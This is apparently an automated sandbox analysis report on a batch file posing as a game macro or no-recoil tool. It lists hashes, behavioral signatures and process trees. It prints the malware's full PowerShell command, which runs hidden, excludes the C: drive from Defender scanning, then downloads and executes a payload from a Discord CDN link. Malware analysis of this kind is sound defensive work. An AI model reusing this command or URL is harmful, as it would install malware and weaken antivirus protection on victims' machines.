Analysis
- max time kernel: 17s
- max time network: 19s
- platform: windows7_x64
- resource: win7-20240221-en
- resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
- submitted: 10-03-2024 11:21
Static task: static1
Behavioral task behavioral1
- Sample: sekmeme olta/makro olta makro/koid.exe
- Resource: win7-20240220-en
Behavioral task behavioral2
- Sample: sekmeme olta/makro olta makro/koid.exe
- Resource: win10v2004-20240226-en
Behavioral task behavioral3
- Sample: sekmeme olta/sekmemeotoayar.bat
- Resource: win7-20240221-en
Behavioral task behavioral4
- Sample: sekmeme olta/sekmemeotoayar.bat
- Resource: win10v2004-20240226-en
General
- Target: sekmeme olta/sekmemeotoayar.bat
- Size: 12KB
- MD5: b585b6ebb583d11eebb2ff5392d27724
- SHA1: 98e215b33ee123d0f3e1d9ca88af3d6ea2c89a3c
- SHA256: a3a60d095e054a2fb6b951cb499df5bae45d6c4361cd9c3a338a61690e388ea1
- SHA512: ce07e1daeec628ef391c0b11d6240e9606c8440d3cf09217b81788e7d0de5ecdbd66653a57276d6c3731523c6a64ac921b5e870386b571828d201f86481496c3
- SSDEEP: 384:1bvuYOOQ1CvlyejVghBYjiVKRq5aixzorf9BLEHQ:1bXf8oKK80ixuUHQ
Malware Config
- Extracted: https://cdn.discordapp.com/attachments/1167569425721995295/1167776678743908422/Exela.exe
Signatures
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes:
    pid   process
    2860  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  2860  powershell.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes:
    description                       pid   process  target process
    PID 2804 wrote to memory of 2632  2804  cmd.exe  fsutil.exe
    PID 2804 wrote to memory of 2632  2804  cmd.exe  fsutil.exe
    PID 2804 wrote to memory of 2632  2804  cmd.exe  fsutil.exe
    PID 2804 wrote to memory of 2860  2804  cmd.exe  powershell.exe
    PID 2804 wrote to memory of 2860  2804  cmd.exe  powershell.exe
    PID 2804 wrote to memory of 2860  2804  cmd.exe  powershell.exe
Processes
- [1] C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\sekmeme olta\sekmemeotoayar.bat"
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\fsutil.exe
    Command line: fsutil dirty query C:
  - [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell -w hidden -c Add-MpPreference -ExclusionPath "C:";Start-BitsTransfer -Source "https://cdn.discordapp.com/attachments/1167569425721995295/1167776678743908422/Exela.exe" -Destination "C:\srchost.bat";Invoke-expression "C:\srchost.bat"
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
Downloads
- memory/2860-4-0x000000001B3D0000-0x000000001B6B2000-memory.dmp (filesize 2.9MB)
- memory/2860-5-0x0000000002360000-0x0000000002368000-memory.dmp (filesize 32KB)
- memory/2860-6-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp (filesize 9.6MB)
- memory/2860-7-0x00000000026D0000-0x0000000002750000-memory.dmp (filesize 512KB)
- memory/2860-8-0x00000000026D0000-0x0000000002750000-memory.dmp (filesize 512KB)
- memory/2860-9-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp (filesize 9.6MB)
- memory/2860-10-0x00000000026D0000-0x0000000002750000-memory.dmp (filesize 512KB)
- memory/2860-11-0x000007FEF57A0000-0x000007FEF613D000-memory.dmp (filesize 9.6MB)